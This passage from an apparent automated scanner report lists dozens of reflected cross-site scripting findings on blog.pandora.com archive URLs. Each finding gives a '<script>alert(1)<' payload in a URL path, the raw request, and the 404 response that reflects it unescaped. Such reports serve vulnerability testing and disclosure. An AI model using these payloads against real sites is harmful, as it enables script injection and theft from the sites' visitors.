Path: | /pandora/archives/2008/07 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47138<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora47138<script>alert(1)< ...[SNIP]... |
3.162. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/07 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese4152<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese4152<script>alert(1)< ...[SNIP]... |
3.163. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/07 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200812ccb<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200812ccb<script>alert(1)< ...[SNIP]... |
3.164. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/07 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/07a9e3c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)< ...[SNIP]... |
3.165. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/08 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora56d79<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora56d79<script>alert(1)< ...[SNIP]... |
3.166. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/08 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25bf5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25bf5<script>alert(1)< ...[SNIP]... |
3.167. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/08 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085abe6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 348 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20085abe6<script>alert(1)< ...[SNIP]... |
3.168. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/08 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/0870934<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/0870934<script>alert(1)< ...[SNIP]... |
3.169. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/09 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac95c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraac95c<script>alert(1)< ...[SNIP]... |
3.170. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/09 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb2c5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archiveseb2c5<script>alert(1)< ...[SNIP]... |
3.171. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/09 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008e57ea<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008e57ea<script>alert(1)< ...[SNIP]... |
3.172. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/09 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/09500d6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)< ...[SNIP]... |
3.173. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora872c8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora872c8<script>alert(1)< ...[SNIP]... |
3.174. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives69a72<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives69a72<script>alert(1)< ...[SNIP]... |
3.175. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008c1a34<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008c1a34<script>alert(1)< ...[SNIP]... |
3.176. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/10ef2f7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)< ...[SNIP]... |
3.177. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora685f7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora685f7<script>alert(1)< ...[SNIP]... |
3.178. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbce64<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbce64<script>alert(1)< ...[SNIP]... |
3.179. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086e4b2<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20086e4b2<script>alert(1)< ...[SNIP]... |
3.180. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/113a15c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)< ...[SNIP]... |
3.181. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8089c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8089c<script>alert(1)< ...[SNIP]... |
3.182. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7be86<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7be86<script>alert(1)< ...[SNIP]... |
3.183. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20089cdec<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20089cdec<script>alert(1)< ...[SNIP]... |
3.184. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/126330d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/126330d<script>alert(1)< ...[SNIP]... |
3.185. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/01 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9e242<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9e242<script>alert(1)< ...[SNIP]... |
3.186. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/01 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives89b64<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives89b64<script>alert(1)< ...[SNIP]... |
3.187. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/01 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097feb3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097feb3<script>alert(1)< ...[SNIP]... |
3.188. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/01 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/01b4d46<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:06 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)< ...[SNIP]... |
3.189. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/02 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4d541<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4d541<script>alert(1)< ...[SNIP]... |
3.190. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
